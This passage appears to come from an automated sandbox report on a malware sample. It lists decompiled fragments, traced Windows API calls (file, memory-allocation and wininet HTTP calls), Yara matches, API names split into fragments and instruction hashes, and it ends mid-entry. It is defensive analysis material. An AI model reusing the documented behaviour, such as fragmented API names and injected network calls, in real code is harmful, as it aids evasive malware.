                                              				intOrPtr _t23;
                                              
                                              				_v40.lStructSize = 0;
                                              				_v40.hwndOwner = 0;
                                              				_v40.hInstance = 0;
                                              				_v40.rgbResult = 0;
                                              				_v40.lpCustColors = 0;
                                              				_v40.Flags = 0;
                                              				_v40.lCustData = 0;
                                              				_v40.lpfnHook = 0;
                                              				_v40.lpTemplateName = 0;
                                              				_v40.lStructSize = 0x24;
                                              				_v40.hwndOwner = _a4;
                                              				_v40.lpCustColors = 0x305948;
                                              				_t23 =  *0x304a00; // 0xffffff
                                              				_v40.rgbResult = _t23;
                                              				_v40.Flags = 3;
                                              				ChooseColorW( &_v40);
                                              				return _v40.rgbResult;
			}

                                              APIs
                                              • ChooseColorW.COMDLG32(00000024), ref: 002FCA9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: ChooseColor
                                              • String ID: $$HY0
                                              • API String ID: 2281747019-3994700921
                                              • Opcode ID: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction ID: b252ff451443ef245a48edfba134aa7b02e4529d1b699c573de1526c769efafe
                                              • Opcode Fuzzy Hash: 29c35fed1e5680b95e6aba352378ac6c88fedb1cd7df3e85a167553e4f43525c
                                              • Instruction Fuzzy Hash: 22F017B4D052099FCB81DFA9D9496AEBBF4BB08310F20456AD908F3340E7755A44CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 100%
                                              			E002F540D(char _a4) {
                                              				struct HINSTANCE__** _t5;
                                              
                                              				if(_a4 == 0) {
                                              					_t5 = 0x305620;
                                              					do {
                                              						if( *_t5 != 0) {
                                              							if( *_t5 != 0xffffffff) {
                                              								FreeLibrary( *_t5);
                                              							}
                                              							 *_t5 =  *_t5 & 0x00000000;
                                              						}
                                              						_t5 =  &(_t5[1]);
                                              					} while (_t5 != 0x305670);
                                              				}
                                              				return 1;
			}

                                              APIs
                                              • FreeLibrary.KERNEL32(00305620), ref: 002F542A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.743554969.00000000002F1000.00000020.00020000.sdmp, Offset: 002F0000, based on PE: true
• Associated: 00000002.00000002.743539901.00000000002F0000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743627285.00000000002FE000.00000002.00020000.sdmp
• Associated: 00000002.00000002.743660121.0000000000304000.00000008.00020000.sdmp
• Associated: 00000002.00000002.743687948.0000000000306000.00000002.00020000.sdmp
• Associated: 00000002.00000002.744254245.0000000000315000.00000002.00020000.sdmp
                                              Similarity
                                              • API ID: FreeLibrary
                                              • String ID: V0$pV0
                                              • API String ID: 3664257935-2562600905
                                              • Opcode ID: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction ID: 55738b24e014b095ddc245c200214a5d48684adbd488d9da3631c053ac046ecb
                                              • Opcode Fuzzy Hash: 09daf7b0007e3a80d10bf1937d6a9fe0ea3acbcb85daa5fc87429c4f136ea55e
                                              • Instruction Fuzzy Hash: 40E04F3682196E9ADB320E08E408371BAD49750376F95553AD6DC121E092751CE1DA81
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Executed Functions

                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,008B3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,008B3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 008B821D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction ID: cdbae740e94a3fbee9798ff93ff784d5e01b7ea1d561afa6421b93953d0587d9
                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction Fuzzy Hash: 5DF0B2B2200208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtReadFile.NTDLL(008B3D62,5E972F59,FFFFFFFF,008B3A21,?,?,008B3D62,?,008B3A21,FFFFFFFF,5E972F59,008B3D62,?,00000000), ref: 008B82C5
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction ID: 8111d43cfca7d73c103077af3b9d999ee206fc6042b3b5fbe6e14d41dddbbddd
                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                              • Instruction Fuzzy Hash: 53F0A4B2200208ABCB14DF89DC81EEB77ADEF8C754F158649BA1D97241DA30E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008A2D11,00002000,00003000,00000004), ref: 008B83E9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 888ca3871c5010298ba7c4df96c0a93331b8e68e5c089ebcd3260efd7ede2dec
                                              • Instruction ID: 4a1e3c92f1b6406b73426cf2adf7d4be4ad6633f5babaf2dcf1b413b13fbaf49
                                              • Opcode Fuzzy Hash: 888ca3871c5010298ba7c4df96c0a93331b8e68e5c089ebcd3260efd7ede2dec
                                              • Instruction Fuzzy Hash: 02F015B6200109AFDB24DF98DC81EEB77ADFF98754F158649FA0997241CA31E811CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,008A2D11,00002000,00003000,00000004), ref: 008B83E9
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction ID: 1ee823ad3305cc5f75402fa01277466d1c91ff56b5ecbd721fa6449672957ccf
                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                              • Instruction Fuzzy Hash: 9BF015B2200208ABCB14DF89CC81EEB77ADEF88750F158549BE0897241C630F810CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • NtClose.NTDLL(008B3D40,?,?,008B3D40,00000000,FFFFFFFF), ref: 008B8325
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction ID: 4157eee80bf03b8dc7551d259062169ceb2041c32dfee79b8209f6fec1f90881
                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                              • Instruction Fuzzy Hash: 2BD01275200218ABD710EF98CC45ED7775CEF44750F154455BA189B242C570F90087E0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 51fcc739614a9ea7e024dea1d921a97205a5f0a5d133e7d0b4868d305eccdc08
                                              • Instruction ID: 1fcc0cc3b1ec398368d27cd00e11ca28d021a1da7ff30fb68629c6ded9f7653d
                                              • Opcode Fuzzy Hash: 51fcc739614a9ea7e024dea1d921a97205a5f0a5d133e7d0b4868d305eccdc08
                                              • Instruction Fuzzy Hash: 59900261242041527545B15984049074047A7F0285791C516E2409A64C8566E85AE661
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 43edc05202c9390f1561539c151816c2c616ab1acb65951e6853ae6bb902fa78
                                              • Instruction ID: 1047f2f8504e5e1dbeca0f3691b82a9f87e65a1c758e149b257664b2c00d3cc9
                                              • Opcode Fuzzy Hash: 43edc05202c9390f1561539c151816c2c616ab1acb65951e6853ae6bb902fa78
                                              • Instruction Fuzzy Hash: 3690027120100413F11171598504B07004A97E0285F91C916E141966CD9696D956B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: eea4b8b4864ed92174382ae70b5684471e27bb7f7a023817e514829b148d4721
                                              • Instruction ID: c2a98481ffef34cd6ad24a8056f55aa9f8866e559758a876667793e45091ed0f
                                              • Opcode Fuzzy Hash: eea4b8b4864ed92174382ae70b5684471e27bb7f7a023817e514829b148d4721
                                              • Instruction Fuzzy Hash: 1D9002A134100442F10071598414F060046D7F1345F51C519E2059668D8659DC567166
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 14aed4b9215355a7803ca447bd82037434418aff754ff9dbf7f9c7cdca074833
                                              • Instruction ID: 668024f7d11613b3258b62406c204fc157050477a39b30566b8ce753b8075fdf
                                              • Opcode Fuzzy Hash: 14aed4b9215355a7803ca447bd82037434418aff754ff9dbf7f9c7cdca074833
                                              • Instruction Fuzzy Hash: BE9002A120200003610571598414A16404B97F0245B51C525E20096A4DC565D8957165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4e48cfe0badccc412d0207611d0df27cfe632784cd1c0f2fe0737f8bf1f572dd
                                              • Instruction ID: 7489db12047048ef637df57e0e69442ff4ccda0bfc0e1caaec43c27df30c3919
                                              • Opcode Fuzzy Hash: 4e48cfe0badccc412d0207611d0df27cfe632784cd1c0f2fe0737f8bf1f572dd
                                              • Instruction Fuzzy Hash: D59002B120100402F14071598404B46004697E0345F51C515E6059668E8699DDD976A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: cb4aebaffda55ee58cc9ceeebaef4e60856a45cb1414f2d8b58415ff32088ed8
                                              • Instruction ID: 1e7778d6aee0fd99856b89aaafdd433f3b2028ed554fdd43108a44042b2f6ede
                                              • Opcode Fuzzy Hash: cb4aebaffda55ee58cc9ceeebaef4e60856a45cb1414f2d8b58415ff32088ed8
                                              • Instruction Fuzzy Hash: 99900265211000032105B5594704907008797E5395351C525F200A664CD661D8656161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ad9853b180354349ddf43d5593960e1d687169e00f619199a9f93f89bdb103e7
                                              • Instruction ID: fc3df9d2b126234e4e49e552ad14c69942acbfc2bacc105e43b7dfd58e1f0825
                                              • Opcode Fuzzy Hash: ad9853b180354349ddf43d5593960e1d687169e00f619199a9f93f89bdb103e7
                                              • Instruction Fuzzy Hash: 6990027120100842F10071598404F46004697F0345F51C51AE1119768D8655D8557561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c8c91ced2eefc5501c2df2f569afd723f9b62376c0b137de71c4c0a84b2d016b
                                              • Instruction ID: f763d4764f7d2f015f6e09dd40c792fd3183cddf5c860ae4b97d39252fea99e5
                                              • Opcode Fuzzy Hash: c8c91ced2eefc5501c2df2f569afd723f9b62376c0b137de71c4c0a84b2d016b
                                              • Instruction Fuzzy Hash: 2190027120108802F1107159C404B4A004697E0345F55C915E541976CD86D5D8957161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 77a56143934389986ecc23d938f6b153cb004f89c3f73c8ebaef1ff4028d2c52
                                              • Instruction ID: c4962646f9e6c547015f28d56cbcc9ef6a4ce08e321a3030af829a8dd20e2b1c
                                              • Opcode Fuzzy Hash: 77a56143934389986ecc23d938f6b153cb004f89c3f73c8ebaef1ff4028d2c52
                                              • Instruction Fuzzy Hash: 5090026121180042F20075698C14F07004697E0347F51C619E1149668CC955D8656561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: eb00bc5dd60d9fa7f57b428c19cad745bad73cf53156896b2117663c20de142b
                                              • Instruction ID: 35b2ac6996825344f10ccf6661092e1476b178e62bda9d2194e73b6dbdbcc2a2
                                              • Opcode Fuzzy Hash: eb00bc5dd60d9fa7f57b428c19cad745bad73cf53156896b2117663c20de142b
                                              • Instruction Fuzzy Hash: A490027120504842F14071598404E46005697E0349F51C515E10597A8D9665DD59B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d1cc6dcdf7a2c0b8a6b7793a2d79754006b6be75cb32c6b4a8dbc4113f010198
                                              • Instruction ID: bd32bf7c5e78f7000d4002e7b212815f1e1a19d83f031d9607e13760aae10dbd
                                              • Opcode Fuzzy Hash: d1cc6dcdf7a2c0b8a6b7793a2d79754006b6be75cb32c6b4a8dbc4113f010198
                                              • Instruction Fuzzy Hash: 6090027120100802F18071598404A4A004697E1345F91C519E101A768DCA55DA5D77E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: f9badab6486bca8a196e1adf1bef7512e9bb1304306781f9bb66c97863c38243
                                              • Instruction ID: ca8134da3c36e5b2ee65513d3f91caaec3e3ab79394ba8f93aee5d2df4d8c145
                                              • Opcode Fuzzy Hash: f9badab6486bca8a196e1adf1bef7512e9bb1304306781f9bb66c97863c38243
                                              • Instruction Fuzzy Hash: 6790026921300002F18071599408A0A004697E1246F91D919E100A66CCC955D86D6361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ea4110478ca31278ad61234f6ea9ce8eb0793e06bdfc3cbbb559f4ed6790504d
                                              • Instruction ID: 8420980e46c2ce40a16e0ad9cdeec5dd03ab5655d3e3c176a42cca86cd61477b
                                              • Opcode Fuzzy Hash: ea4110478ca31278ad61234f6ea9ce8eb0793e06bdfc3cbbb559f4ed6790504d
                                              • Instruction Fuzzy Hash: D290027131114402F1107159C404B06004697E1245F51C915E181966CD86D5D8957162
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.915794120.0000000004810000.00000040.00000001.sdmp, Offset: 04810000, based on PE: true
                                              • Associated: 0000000B.00000002.915983380.000000000492B000.00000040.00000001.sdmp
                                              • Associated: 0000000B.00000002.915996409.000000000492F000.00000040.00000001.sdmp
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 11e27f505d7e5591d9b50ebc2c110c6add995975276582c8c45f047ad1c8d0d1
                                              • Instruction ID: ad3c7fbe93b5c3066ae3480b8b097d51de676ff0b5ffc95e327b165f011ebf4f
                                              • Opcode Fuzzy Hash: 11e27f505d7e5591d9b50ebc2c110c6add995975276582c8c45f047ad1c8d0d1
                                              • Instruction Fuzzy Hash: 9990027120100402F10075999408A46004697F0345F51D515E6019669EC6A5D8957171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B8948
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpOpenRequest
                                              • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                              • API String ID: 1984915467-4016285707
                                              • Opcode ID: e2f3c66845dad4a079d58a7aadd309ce284a991ece94f85822e95b65ce1da984
                                              • Instruction ID: d2bb4a4300e263bd0737fe063e2292ff97582d60847dc32efe3d458e90399f16
                                              • Opcode Fuzzy Hash: e2f3c66845dad4a079d58a7aadd309ce284a991ece94f85822e95b65ce1da984
                                              • Instruction Fuzzy Hash: 8D0105B2904109AFCB14DF88C841DEF7BB9FB48210F158258FA09A7305C630AD11CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpOpenRequestA.WININET(RequestA,OpenRequestA,HttpOpenRequestA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B8948
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpOpenRequest
                                              • String ID: Http$HttpOpenRequestA$HttpOpenRequestA$Open$OpenRequestA$Requ$RequestA$estA
                                              • API String ID: 1984915467-4016285707
                                              • Opcode ID: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction ID: 51992d86952166a6194c420b7f27c835a5b3352886eee5ce50f1171906c08f86
                                              • Opcode Fuzzy Hash: 6c1eafa3af226a689b846ded80bf8f0a7dd1c2f620c7b46790f01cf217bfb4e9
                                              • Instruction Fuzzy Hash: 5101D7B2905119ABCB14DF98D841DEF7BBDEB48210F158288FD48A7305D630ED10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 008B89BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-2503632690
                                              • Opcode ID: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction ID: 844929c949d6b4f8d8385606af5342ed9d8fc52527f1ffeca4cf5f405645f19f
                                              • Opcode Fuzzy Hash: 177ccb57ee224b759035b8d17f1308ad0ebf8aeb9cb95bc6b42b40d67c27329b
                                              • Instruction Fuzzy Hash: 47012CB2905118ABCB00DF98D841AEF7BBCEB44210F148189FD08A7305D670EE10CBE2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • HttpSendRequestA.WININET(RequestA,SendRequestA,HttpSendRequestA,00000000,?,?,?,?,00000000), ref: 008B89BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: HttpRequestSend
                                              • String ID: Http$HttpSendRequestA$HttpSendRequestA$Requ$RequestA$Send$SendRequestA$estA
                                              • API String ID: 360639707-2503632690
                                              • Opcode ID: a33204397b9f433b37466c435445c109003b18bc6a6053b5a18d1c6c681b8905
                                              • Instruction ID: 3108b23b4da42de98c69dfe06db52fdced05a5401c1112eb0e8b7a505d37b7d2
                                              • Opcode Fuzzy Hash: a33204397b9f433b37466c435445c109003b18bc6a6053b5a18d1c6c681b8905
                                              • Instruction Fuzzy Hash: 6F0128B1905119AFCB04DF98C845AEFBB78FF59310F158199FD08AB204D770AA10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B88C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                              • API String ID: 3050416762-1024195942
                                              • Opcode ID: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction ID: 16931b03177072630e962e3bc24c7d54413d695536523c506890fda35e571246
                                              • Opcode Fuzzy Hash: 7ed34138f7708cf7613383558ca86b8bd00d3c79a0a04dd4c06582688efb1e76
                                              • Instruction Fuzzy Hash: C201D7B2905118AFCB14DF99D941EEF77B9EB48310F158289BE08A7241D670EE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • InternetConnectA.WININET(ConnectA,rnetConnectA,InternetConnectA,00000000,?,?,?,?,?,?,?,00000000), ref: 008B88C8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: ConnectInternet
                                              • String ID: Conn$ConnectA$Inte$InternetConnectA$ectA$rnet$rnetConnectA
                                              • API String ID: 3050416762-1024195942
                                              • Opcode ID: 6677eb675f016cdf88c15852923043979f5537932403f1af99a9423d5bcf3d9b
                                              • Instruction ID: 4c3e392854cf5ed1941dfd5add3474ab0e3590950644d9b3618135a4e07fc853
                                              • Opcode Fuzzy Hash: 6677eb675f016cdf88c15852923043979f5537932403f1af99a9423d5bcf3d9b
                                              • Instruction Fuzzy Hash: FA011BB2905159AFCB14DF88D981AEF7BB9FF48300F154198BA48A7241D630EA11CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • InternetOpenA.WININET(rnetOpenA,InternetOpenA,?,?,?), ref: 008B8847
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: InternetOpen
                                              • String ID: A$Inte$InternetOpenA$Open$rnet$rnetOpenA
                                              • API String ID: 2038078732-3155091674
                                              • Opcode ID: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction ID: 23a7627897b141311b856cbbeee834da830c8f4a7d86ce54c22c6a1d7e28f929
                                              • Opcode Fuzzy Hash: 883d24814d1d434d2a1ce25732a84b13edda96a210da1abb7f18c8cad43de92b
                                              • Instruction Fuzzy Hash: CFF019B2901119AF8B14DF98DC419EBB7BCFF48310B048589FE18A7301D630AE10CBE1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 008B6F98
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000B.00000002.914915179.00000000008A0000.00000040.00000001.sdmp, Offset: 008A0000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                                              • Instruction ID: 82bc052fa2da8448638cc40b1295143d8ac9bb662bd94b7bc7856169aaecbb9f
                                              • Opcode Fuzzy Hash: 9af03f7d8b8f3cb13721ec944da4d2b0e0be474876f60c5ffa2889f2ab7990b6
                                              • Instruction Fuzzy Hash: B5318EB1601704ABC711DF68D8A1FABB7B8FB88700F00841DF65AAB341D734B555CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 008B6F98
                                              Strings
                                              Memory Dump Source
